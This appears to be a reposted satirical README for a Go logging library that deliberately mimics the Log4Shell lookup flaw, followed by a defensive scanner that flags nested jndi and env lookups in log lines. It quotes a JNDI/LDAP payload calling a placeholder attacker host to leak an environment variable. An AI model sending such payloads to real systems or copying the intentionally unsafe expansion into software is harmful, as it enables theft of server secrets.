Jndi: An irresponsibly bad logging library

December 11, 2021
by News Editor
in Science, Tech
Is CVE-2021-44228 making you feel left out as a Go programmer?

Fear not. We can fix that.

I wouldn’t use this package, but if you want to…

package main

import (
	"net/http"

	"github.com/bradfitz/jndi"
)

var logger = jndi.NewLogger()

func main() {
	//...
}

// handleSomeTraffic logs the request path, which is chosen by the client.
func handleSomeTraffic(r *http.Request) {
	logger.Printf("got request from %s", r.URL.Path)
}

Congrats, the user actually wrote ${jndi:ldap://attacker.example/${env:${lower:u}ser}} and
the logger expanded your environment variable and sent it over the network
as a side-effect of logging.
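
A defensive counterpart to the expansion described above, as an added example that is not part of the jndi package or the original README: a scanner that collapses nested `lower`/`upper` lookups without evaluating anything and reports `jndi` and `env` lookups found in a log line. `Scan`, the `risky` set and the sample lines are assumptions made for illustration; handling `upper` goes beyond the single `lower` case quoted above.

```go
package main

import (
	"fmt"
	"regexp"
	"strings"
)

// innermost matches a ${...} token that has no other token nested inside it.
var innermost = regexp.MustCompile(`\$\{([^${}]*)\}`)

// risky lists lookups that read secrets or reach the network (assumed set).
var risky = map[string]bool{"jndi": true, "env": true}

// Scan collapses pure string lookups (lower, upper) from the inside out so
// nested obfuscation disappears, and returns the risky lookup names it meets.
// Nothing is evaluated: no environment read, no connection.
func Scan(line string) []string {
	var found []string
	for { // each pass removes one "${", so the loop always terminates
		loc := innermost.FindStringSubmatchIndex(line)
		if loc == nil {
			return found
		}
		name, arg, _ := strings.Cut(line[loc[2]:loc[3]], ":")
		name = strings.ToLower(name)
		repl := "" // risky and unknown lookups are dropped, never resolved
		switch {
		case name == "lower":
			repl = strings.ToLower(arg)
		case name == "upper":
			repl = strings.ToUpper(arg)
		case risky[name]:
			found = append(found, name)
		}
		line = line[:loc[0]] + repl + line[loc[1]:]
	}
}

func main() {
	// Constructed sample lines; the second carries the string quoted above.
	for _, l := range []string{
		"got request from /index.html",
		"got request from ${jndi:ldap://attacker.example/${env:${lower:u}ser}}",
	} {
		fmt.Println(Scan(l), l)
	}
}
```

Matching on the literal text `${env:user}` would miss the quoted string, because `user` only appears after the inner `lower` lookup has been collapsed.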

Inspiration

I saw https://twitter.com/_StaticFlow_/status/1469358229767475205 and thought it’d
be fun to write an expander while I was bored, stuck in transit.

Bugs

This package is incomplete. log4j actually does a bunch more:

  • https://logging.apache.org/log4j/2.x/manual/configuration.html#PropertySubstitution
  • https://logging.apache.org/log4j/2.x/manual/lookups.html

Patches welcome to help flesh this package out. We’ve got some
catching up to do.

Apologies

In case you’re seeing this on GitHub and not via Twitter, I acknowledged
that this is questionable taste: https://twitter.com/bradfitz/status/1469523985998118925

In general I believe in the whole #hugops thing. I had a CVE filed against
my own code just the day before: https://twitter.com/bradfitz/status/1469015417679081472

It happens. I joke to cope.
